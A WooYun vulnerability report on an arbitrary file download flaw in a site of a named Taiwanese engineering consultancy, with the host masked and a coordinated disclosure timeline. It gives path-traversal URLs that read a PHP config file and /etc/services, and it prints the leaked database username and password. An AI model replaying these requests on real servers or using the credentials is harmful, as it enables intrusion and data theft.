中興工程顧問股份有限公司某站設計缺陷任意文件下載（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168935

漏洞标题：中興工程顧問股份有限公司某站設計缺陷任意文件下載（臺灣地區）

漏洞作者： j0k3r

提交时间：2016-01-11 13:39

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-11：细节已通知厂商并且等待厂商处理中
2016-01-12：厂商已经确认，细节仅向厂商公开
2016-01-22：细节向核心白帽子及相关领域专家公开
2016-02-01：细节向普通白帽子公开
2016-02-11：细节向实习白帽子公开
2016-02-22：细节向公众公开

简要描述：

详细说明：

目标：http://**.**.**.**
构造，

http://**.**.**.**/chinese/02_about/download.php?f=../index.php

数据库配置文件

http://**.**.**.**/chinese/02_about/download.php?f=../include/php_script/common.php

common.php中

$DB_str = "mysql,localhost,gercweb, creative, gerc_ctr";

database/DB_class.php中的GetServerInfo函数，

function GetServerInfo($DB_str){
		$DB_info = array(
			'type'  => false,
			'host' => false,
			'dbname' => false,
			'user' => false,
			'password' => false
		);		
		$Store_info = split(",",$DB_str);
		$DB_info['type'] = $Store_info[0];
		$DB_info['host'] = $Store_info[1];
		$DB_info['dbname'] = $Store_info[2];
		$DB_info['user'] = $Store_info[3];
		$DB_info['password'] = $Store_info[4];
		return $DB_info;

数据库用户名密码即为creative/gerc_ctr
系统文件services

http://**.**.**.**/chinese/02_about/download.php?f=../../../../../../etc/services

services中

# Network services, Internet style
#
# Note that it is presently the policy of IANA to assign a single well-known
# port number for both TCP and UDP; hence, officially ports have two entries
# even if the protocol doesn't support UDP operations.
#
# Updated from http://**.**.**.**/assignments/port-numbers and other
# sources like http://**.**.**.**/cgi/cvsweb.cgi/src/etc/services .
# New ports will be added on request if they have been officially assigned
# by IANA and used in the real-world or are needed by a debian package.
# If you need a huge list of used numbers please install the nmap package.
tcpmux		1/tcp				# TCP port service multiplexer
echo		7/tcp
echo		7/udp
discard		9/tcp		sink null
discard		9/udp		sink null
systat		11/tcp		users
daytime		13/tcp
daytime		13/udp
netstat		15/tcp
qotd		17/tcp		quote
msp		18/tcp				# message send protocol
msp		18/udp
chargen		19/tcp		ttytst source
chargen		19/udp		ttytst source
ftp-data	20/tcp
ftp		21/tcp
fsp		21/udp		fspd
ssh		22/tcp				# SSH Remote Login Protocol
ssh		22/udp
telnet		23/tcp
smtp		25/tcp		mail
time		37/tcp		timserver
time		37/udp		timserver
rlp		39/udp		resource	# resource location
nameserver	42/tcp		name		# IEN 116
whois		43/tcp		nicname
tacacs		49/tcp				# Login Host Protocol (TACACS)
tacacs		49/udp
re-mail-ck	50/tcp				# Remote Mail Checking Protocol
re-mail-ck	50/udp
domain		53/tcp				# Domain Name Server
domain		53/udp
mtp		57/tcp				# deprecated
tacacs-ds	65/tcp				# TACACS-Database Service
tacacs-ds	65/udp
bootps		67/tcp				# BOOTP server
bootps		67/udp
bootpc		68/tcp				# BOOTP client
bootpc		68/udp
tftp		69/udp
gopher		70/tcp				# Internet Gopher
gopher		70/udp
rje		77/tcp		netrjs
finger		79/tcp
http		80/tcp		www		# WorldWideWeb HTTP
http		80/udp				# HyperText Transfer Protocol
link		87/tcp		ttylink
kerberos	88/tcp		kerberos5 krb5 kerberos-sec	# Kerberos v5
kerberos	88/udp		kerberos5 krb5 kerberos-sec	# Kerberos v5
supdup		95/tcp
hostnames	101/tcp		hostname	# usually from sri-nic
iso-tsap	102/tcp		tsap		# part of ISODE
acr-nema	104/tcp		dicom		# Digital Imag. & Comm. 300
acr-nema	104/udp		dicom
csnet-ns	105/tcp		cso-ns		# also used by CSO name server
csnet-ns	105/udp		cso-ns
rtelnet		107/tcp				# Remote Telnet
rtelnet		107/udp
pop2		109/tcp		postoffice pop-2 # POP version 2
pop2		109/udp		pop-2
pop3		110/tcp		pop-3		# POP version 3
pop3		110/udp		pop-3
sunrpc		111/tcp		portmapper	# RPC 4.0 portmapper
sunrpc		111/udp		portmapper
auth		113/tcp		authentication tap ident
sftp		115/tcp
uucp-path	117/tcp
nntp		119/tcp		readnews untp	# USENET News Transfer Protocol
ntp		123/tcp
ntp		123/udp				# Network Time Protocol
pwdgen		129/tcp				# PWDGEN service
pwdgen		129/udp
loc-srv		135/tcp		epmap		# Location Service
loc-srv		135/udp		epmap
netbios-ns	137/tcp				# NETBIOS Name Service
netbios-ns	137/udp
netbios-dgm	138/tcp				# NETBIOS Datagram Service
netbios-dgm	138/udp
netbios-ssn	139/tcp				# NETBIOS session service
netbios-ssn	139/udp
imap2		143/tcp		imap		# Interim Mail Access P 2 and 4
imap2		143/udp		imap
snmp		161/tcp				# Simple Net Mgmt Protocol
snmp		161/udp
snmp-trap	162/tcp		snmptrap	# Traps for SNMP
snmp-trap	162/udp		snmptrap
cmip-man	163/tcp				# ISO mgmt over IP (CMOT)
cmip-man	163/udp
cmip-agent	164/tcp
cmip-agent	164/udp
mailq		174/tcp			# Mailer transport queue for Zmailer
mailq		174/udp
xdmcp		177/tcp				# X Display Mgr. Control Proto
xdmcp		177/udp
nextstep	178/tcp		NeXTStep NextStep	# NeXTStep window
nextstep	178/udp		NeXTStep NextStep	#  server
bgp		179/tcp				# Border Gateway Protocol
bgp		179/udp
prospero	191/tcp				# Cliff Neuman's Prospero
prospero	191/udp
irc		194/tcp				# Internet Relay Chat
irc		194/udp
smux		199/tcp				# SNMP Unix Multiplexer
smux		199/udp
at-rtmp		201/tcp				# AppleTalk routing
at-rtmp		201/udp
at-nbp		202/tcp				# AppleTalk name binding
at-nbp		202/udp
at-echo		204/tcp				# AppleTalk echo
at-echo		204/udp
at-zis		206/tcp				# AppleTalk zone information
at-zis		206/udp
qmtp		209/tcp				# Quick Mail Transfer Protocol
qmtp		209/udp
z3950		210/tcp		wais		# NISO Z39.50 database
z3950		210/udp		wais
ipx		213/tcp				# IPX
ipx		213/udp
imap3		220/tcp				# Interactive Mail Access
imap3		220/udp				# Protocol v3
pawserv		345/tcp				# Perf Analysis Workbench
pawserv		345/udp
zserv		346/tcp				# Zebra server
zserv		346/udp
fatserv		347/tcp				# Fatmen Server
fatserv		347/udp
rpc2portmap	369/tcp
rpc2portmap	369/udp				# Coda portmapper
codaauth2	370/tcp
codaauth2	370/udp				# Coda authentication server
clearcase	371/tcp		Clearcase
clearcase	371/udp		Clearcase
ulistserv	372/tcp				# UNIX Listserv
ulistserv	372/udp
ldap		389/tcp			# Lightweight Directory Access Protocol
ldap		389/udp
imsp		406/tcp			# Interactive Mail Support Protocol
imsp		406/udp
svrloc		427/tcp				# Server Location
svrloc		427/udp
https		443/tcp				# http protocol over TLS/SSL
https		443/udp
snpp		444/tcp				# Simple Network Paging Protocol
snpp		444/udp
microsoft-ds	445/tcp				# Microsoft Naked CIFS
microsoft-ds	445/udp
kpasswd		464/tcp
kpasswd		464/udp
saft		487/tcp			# Simple Asynchronous File Transfer
saft		487/udp
isakmp		500/tcp			# IPsec - Internet Security Association
isakmp		500/udp			#  and Key Management Protocol
rtsp		554/tcp			# Real Time Stream Control Protocol
rtsp		554/udp
nqs		607/tcp				# Network Queuing system
nqs		607/udp
npmp-local	610/tcp		dqs313_qmaster		# npmp-local / DQS
npmp-local	610/udp		dqs313_qmaster
npmp-gui	611/tcp		dqs313_execd		# npmp-gui / DQS
npmp-gui	611/udp		dqs313_execd
hmmp-ind	612/tcp		dqs313_intercell	# HMMP Indication / DQS
hmmp-ind	612/udp		dqs313_intercell
qmqp		628/tcp
qmqp		628/udp
ipp		631/tcp				# Internet Printing Protocol
ipp		631/udp
省略

漏洞证明：

common.php中

$DB_str = "mysql,localhost,gercweb, creative, gerc_ctr";

services中

# Network services, Internet style
#
# Note that it is presently the policy of IANA to assign a single well-known
# port number for both TCP and UDP; hence, officially ports have two entries
# even if the protocol doesn't support UDP operations.
#
# Updated from http://**.**.**.**/assignments/port-numbers and other
# sources like http://**.**.**.**/cgi/cvsweb.cgi/src/etc/services .
# New ports will be added on request if they have been officially assigned
# by IANA and used in the real-world or are needed by a debian package.
# If you need a huge list of used numbers please install the nmap package.
tcpmux		1/tcp				# TCP port service multiplexer
echo		7/tcp
echo		7/udp
discard		9/tcp		sink null
discard		9/udp		sink null
systat		11/tcp		users
daytime		13/tcp
daytime		13/udp
netstat		15/tcp
qotd		17/tcp		quote
msp		18/tcp				# message send protocol
msp		18/udp
chargen		19/tcp		ttytst source
chargen		19/udp		ttytst source
ftp-data	20/tcp
ftp		21/tcp
fsp		21/udp		fspd
ssh		22/tcp				# SSH Remote Login Protocol
ssh		22/udp
telnet		23/tcp
smtp		25/tcp		mail
time		37/tcp		timserver
time		37/udp		timserver
rlp		39/udp		resource	# resource location
nameserver	42/tcp		name		# IEN 116
whois		43/tcp		nicname
tacacs		49/tcp				# Login Host Protocol (TACACS)
tacacs		49/udp
re-mail-ck	50/tcp				# Remote Mail Checking Protocol
re-mail-ck	50/udp
domain		53/tcp				# Domain Name Server
domain		53/udp
mtp		57/tcp				# deprecated
tacacs-ds	65/tcp				# TACACS-Database Service
tacacs-ds	65/udp
bootps		67/tcp				# BOOTP server
bootps		67/udp
bootpc		68/tcp				# BOOTP client
bootpc		68/udp
tftp		69/udp
gopher		70/tcp				# Internet Gopher
gopher		70/udp
rje		77/tcp		netrjs
finger		79/tcp
http		80/tcp		www		# WorldWideWeb HTTP
http		80/udp				# HyperText Transfer Protocol
link		87/tcp		ttylink
kerberos	88/tcp		kerberos5 krb5 kerberos-sec	# Kerberos v5
kerberos	88/udp		kerberos5 krb5 kerberos-sec	# Kerberos v5
supdup		95/tcp
hostnames	101/tcp		hostname	# usually from sri-nic
iso-tsap	102/tcp		tsap		# part of ISODE
acr-nema	104/tcp		dicom		# Digital Imag. & Comm. 300
acr-nema	104/udp		dicom
csnet-ns	105/tcp		cso-ns		# also used by CSO name server
csnet-ns	105/udp		cso-ns
rtelnet		107/tcp				# Remote Telnet
rtelnet		107/udp
pop2		109/tcp		postoffice pop-2 # POP version 2
pop2		109/udp		pop-2
pop3		110/tcp		pop-3		# POP version 3
pop3		110/udp		pop-3
sunrpc		111/tcp		portmapper	# RPC 4.0 portmapper
sunrpc		111/udp		portmapper
auth		113/tcp		authentication tap ident
sftp		115/tcp
uucp-path	117/tcp
nntp		119/tcp		readnews untp	# USENET News Transfer Protocol
ntp		123/tcp
ntp		123/udp				# Network Time Protocol
pwdgen		129/tcp				# PWDGEN service
pwdgen		129/udp
loc-srv		135/tcp		epmap		# Location Service
loc-srv		135/udp		epmap
netbios-ns	137/tcp				# NETBIOS Name Service
netbios-ns	137/udp
netbios-dgm	138/tcp				# NETBIOS Datagram Service
netbios-dgm	138/udp
netbios-ssn	139/tcp				# NETBIOS session service
netbios-ssn	139/udp
imap2		143/tcp		imap		# Interim Mail Access P 2 and 4
imap2		143/udp		imap
snmp		161/tcp				# Simple Net Mgmt Protocol
snmp		161/udp
snmp-trap	162/tcp		snmptrap	# Traps for SNMP
snmp-trap	162/udp		snmptrap
cmip-man	163/tcp				# ISO mgmt over IP (CMOT)
cmip-man	163/udp
cmip-agent	164/tcp
cmip-agent	164/udp
mailq		174/tcp			# Mailer transport queue for Zmailer
mailq		174/udp
xdmcp		177/tcp				# X Display Mgr. Control Proto
xdmcp		177/udp
nextstep	178/tcp		NeXTStep NextStep	# NeXTStep window
nextstep	178/udp		NeXTStep NextStep	#  server
bgp		179/tcp				# Border Gateway Protocol
bgp		179/udp
prospero	191/tcp				# Cliff Neuman's Prospero
prospero	191/udp
irc		194/tcp				# Internet Relay Chat
irc		194/udp
smux		199/tcp				# SNMP Unix Multiplexer
smux		199/udp
at-rtmp		201/tcp				# AppleTalk routing
at-rtmp		201/udp
at-nbp		202/tcp				# AppleTalk name binding
at-nbp		202/udp
at-echo		204/tcp				# AppleTalk echo
at-echo		204/udp
at-zis		206/tcp				# AppleTalk zone information
at-zis		206/udp
qmtp		209/tcp				# Quick Mail Transfer Protocol
qmtp		209/udp
z3950		210/tcp		wais		# NISO Z39.50 database
z3950		210/udp		wais
ipx		213/tcp				# IPX
ipx		213/udp
imap3		220/tcp				# Interactive Mail Access
imap3		220/udp				# Protocol v3
pawserv		345/tcp				# Perf Analysis Workbench
pawserv		345/udp
zserv		346/tcp				# Zebra server
zserv		346/udp
fatserv		347/tcp				# Fatmen Server
fatserv		347/udp
rpc2portmap	369/tcp
rpc2portmap	369/udp				# Coda portmapper
codaauth2	370/tcp
codaauth2	370/udp				# Coda authentication server
clearcase	371/tcp		Clearcase
clearcase	371/udp		Clearcase
ulistserv	372/tcp				# UNIX Listserv
ulistserv	372/udp
ldap		389/tcp			# Lightweight Directory Access Protocol
ldap		389/udp
imsp		406/tcp			# Interactive Mail Support Protocol
imsp		406/udp
svrloc		427/tcp				# Server Location
svrloc		427/udp
https		443/tcp				# http protocol over TLS/SSL
https		443/udp
snpp		444/tcp				# Simple Network Paging Protocol
snpp		444/udp
microsoft-ds	445/tcp				# Microsoft Naked CIFS
microsoft-ds	445/udp
kpasswd		464/tcp
kpasswd		464/udp
saft		487/tcp			# Simple Asynchronous File Transfer
saft		487/udp
isakmp		500/tcp			# IPsec - Internet Security Association
isakmp		500/udp			#  and Key Management Protocol
rtsp		554/tcp			# Real Time Stream Control Protocol
rtsp		554/udp
nqs		607/tcp				# Network Queuing system
nqs		607/udp
npmp-local	610/tcp		dqs313_qmaster		# npmp-local / DQS
npmp-local	610/udp		dqs313_qmaster
npmp-gui	611/tcp		dqs313_execd		# npmp-gui / DQS
npmp-gui	611/udp		dqs313_execd
hmmp-ind	612/tcp		dqs313_intercell	# HMMP Indication / DQS
hmmp-ind	612/udp		dqs313_intercell
qmqp		628/tcp
qmqp		628/udp
ipp		631/tcp				# Internet Printing Protocol
ipp		631/udp
省略

修复方案：

版权声明：转载请注明来源 j0k3r@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2016-01-12 02:14

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168935

漏洞标题：中興工程顧問股份有限公司某站設計缺陷任意文件下載（臺灣地區）

相关厂商：中興工程顧問股份有限公司

漏洞作者： j0k3r

提交时间：2016-01-11 13:39

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 j0k3r@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0168935

漏洞标题：中興工程顧問股份有限公司某站設計缺陷任意文件下載（臺灣地區）

相关厂商：中興工程顧問股份有限公司

漏洞作者： j0k3r

提交时间：2016-01-11 13:39

修复时间：2016-02-22 16:48

公开时间：2016-02-22 16:48

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0168935"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 j0k3r@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：